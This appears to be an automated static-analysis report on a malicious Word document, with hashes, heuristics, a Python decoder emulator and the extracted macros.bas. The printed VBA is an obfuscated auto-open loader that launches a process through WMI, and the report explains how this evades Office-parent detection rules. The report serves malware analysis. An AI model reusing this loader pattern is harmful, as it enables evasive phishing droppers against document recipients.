Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9a9ffccf652fe85…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 134.0 KB
Created: 2019-09-24 06:41:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 127aafd4320e47044f5b4b9278b49612
SHA-1: 6f5df3d06bbdc87798f158d3b27ecd75a36c9a05
SHA-256: e9a9ffccf652fe8597fb9bcfae22c384112414d6491c1d09de967c784dd07a11
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a heavily obfuscated VBA macro loader, flagged by the critical and high severity heuristics OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC. Execution starts in Sub autoopen() (module S8u1adw), which calls Nnazwms. That function routes its strings through Ti1iz0cl, a decoder whose inner Replace call rebuilds the junk token "_:_a" and whose outer Replace strips it from the input; the literal passed to CreateObject decodes to winmgmts:Win32_Process, and the macro then calls .Create on that object. The payload is therefore launched through WMI Win32_Process.Create rather than Shell or WScript.Shell, which is why no Shell or URL string is visible in the source. The command line (Ma37awj5) is assembled from the userform TextBox controls Kkmjww.Mn1kbo6t and Kkmjww.Yfm2nuz, and the third Create argument, Yh3wpj, builds a second COM object from Kkmjww.P5zziw and sets its ShowWindow property, matching the Win32_ProcessStartup object that Create accepts as process startup information. None of those control values are part of the extracted VBA source, so the second-stage command and any download URL cannot be recovered from this static pass; olevba's form-string extraction from the userform's 'o' stream would be the next step. The repeated DoEvents counting loops between statements are junk code. One detection caveat: a process created through Win32_Process.Create has WmiPrvSE.exe as its parent, not WINWORD.EXE, so process-tree rules keyed on an Office parent will miss the launch.

Heuristics (8)

  • CLAMAV_DETECTION [critical]: ClamAV signature Doc.Malware.Generic-7178224-0
    ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0.
  • OLE_VBA_MACROS [medium, 4 related findings]: VBA macros detected
    Document contains VBA macro code.
  • OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER [critical]: Obfuscated auto-exec VBA loader
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder is the junk-token Replace variant (Ti1iz0cl strips "_:_a") and the sink is CreateObject followed by Win32_Process.Create.
  • OLE_VBA_AUTOOPEN [high]: AutoOpen macro
    Module S8u1adw defines Sub autoopen(), which Word runs as soon as macros are enabled; it is the loader's entry point and calls Nnazwms.
  • OLE_VBA_CREATEOBJ [high]: CreateObject call
    Two CreateObject calls, both with arguments routed through the Ti1iz0cl decoder: the one in Nnazwms decodes to winmgmts:Win32_Process, the one in Yh3wpj takes its class name from the form control Kkmjww.P5zziw, which is not in the extracted source.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high]: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC [medium]: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see the macros.bas artifact below), so this marker is redundant with OLE_VBA_AUTOOPEN rather than evidence of a separate WordBasic macro.
  • EMBEDDED_URL [info]: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML schema namespace present in any document with drawing content, not a network indicator.
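The decoder shape described in the summary and in OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER can be emulated outside Word. The following is an added example written for this report, not code from the analyzer, from oletools, or from the macro's author: it re-implements what Ti1iz0cl does in Python, finds the auto-exec entry point, and resolves every CreateObject() argument that passes through that decoder, distinguishing string literals (recoverable) from values read out of userform controls (not in the source). The embedded macro excerpt is a constructed, trimmed copy of the extracted macros.bas shown below with the DoEvents padding loops removed; only the nested-Replace decoder shape used by this sample is handled, and the classification table for decoded monikers is this example's own.

```python
"""Emulate the sample's junk-token string decoder and trace it to its sinks.

Added example for this report; not code from the analyzer, oletools, or the
malware author. It reproduces the VBA function Ti1iz0cl (strip a junk token
that is itself built by a nested Replace call) and resolves the CreateObject()
arguments routed through it. Other decoder shapes named by the heuristic
(numeric char-arrays, hex-string decode) are out of scope.
"""
import re

# Constructed input: the relevant lines of the extracted macros.bas from this
# report, with the DoEvents padding loops and declarations removed.
MACRO_SRC = r'''
Sub autoopen()
Nnazwms
End Sub
Function Nnazwms()
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
End Function
Function Ti1iz0cl(E6pinh)
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function
Function Yh3wpj()
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
End Function
'''

# Auto-exec entry points Word/Excel run without user interaction.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(autoopen|auto_open|autoexec|document_open|workbook_open)\b',
    re.I | re.M)

# Decoder shape: Name = Replace(arg, Replace("<inner>", "<tok>", ""), "")
# The inner Replace yields the junk token; the outer Replace strips it.
DECODER_RE = re.compile(
    r'^(\w+)\s*=\s*Replace\(\s*\w+\s*,\s*'
    r'Replace\("([^"]*)"\s*,\s*"([^"]*)"\s*,\s*""\s*\)\s*,\s*""\s*\)',
    re.M)

# This example's own classification of decoded monikers (assumption: extend as needed).
SINK_CLASSES = {
    "winmgmts:win32_process": "WMI Win32_Process (process creation via .Create)",
}


def decode(value, junk_token):
    """Emulate VBA Replace(value, junk_token, "") with binary compare."""
    return value.replace(junk_token, "")


def find_autoexec(src):
    """Names of auto-exec procedures defined in the source, lower-cased."""
    return [m.group(1).lower() for m in AUTOEXEC_RE.finditer(src)]


def find_junk_token_decoders(src):
    """Map each nested-Replace decoder function to the junk token it strips."""
    return {name: inner.replace(tok, "")
            for name, inner, tok in DECODER_RE.findall(src)}


def resolve_createobject_sinks(src, decoders):
    """Resolve CreateObject(<decoder>(x)); x is a literal or a runtime value."""
    findings = []
    for name, token in decoders.items():
        pat = re.compile(r'CreateObject\(\s*' + re.escape(name)
                         + r'\(\s*(?:"([^"]*)"|([\w.]+))\s*\)\s*\)')
        for m in pat.finditer(src):
            literal, ident = m.group(1), m.group(2)
            if literal is not None:
                decoded = decode(literal, token)
                findings.append({"decoded": decoded,
                                 "class": SINK_CLASSES.get(decoded.lower(),
                                                           "unclassified COM object"),
                                 "origin": "string literal"})
            else:
                # The value lives in a userform control, not in the VBA source.
                findings.append({"decoded": None, "class": "unresolved",
                                 "origin": "runtime value " + ident})
    return findings


def analyze(src):
    autoexec = find_autoexec(src)
    decoders = find_junk_token_decoders(src)
    sinks = resolve_createobject_sinks(src, decoders)
    return {
        "autoexec": autoexec,
        "decoders": decoders,
        "sinks": sinks,
        # Same shape the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic looks for:
        # an auto-exec entry plus a decoded string reaching a COM sink.
        "obfuscated_autoexec_loader": bool(autoexec) and any(s["decoded"] for s in sinks),
    }


if __name__ == "__main__":
    for key, val in analyze(MACRO_SRC).items():
        print(key, "=", val)
```

Run stand-alone it reports autoopen as the entry point, Ti1iz0cl as a decoder stripping "_:_a", one sink resolved to winmgmts:Win32_Process and one left unresolved because its class name comes from Kkmjww.P5zziw. The unresolved sink is the important negative result: it tells the analyst that the rest of the chain (the command line in Ma37awj5 and the startup object) has to come from the userform storage, not from the VBA text.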

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9912 bytes
SHA-256: 02cbe72498c8f5b51254dddb6c2864b280c506f24b8ac6a3cca4dd29c9dae4bb

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/d39d9c043d7944d3b17af66578e403dd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)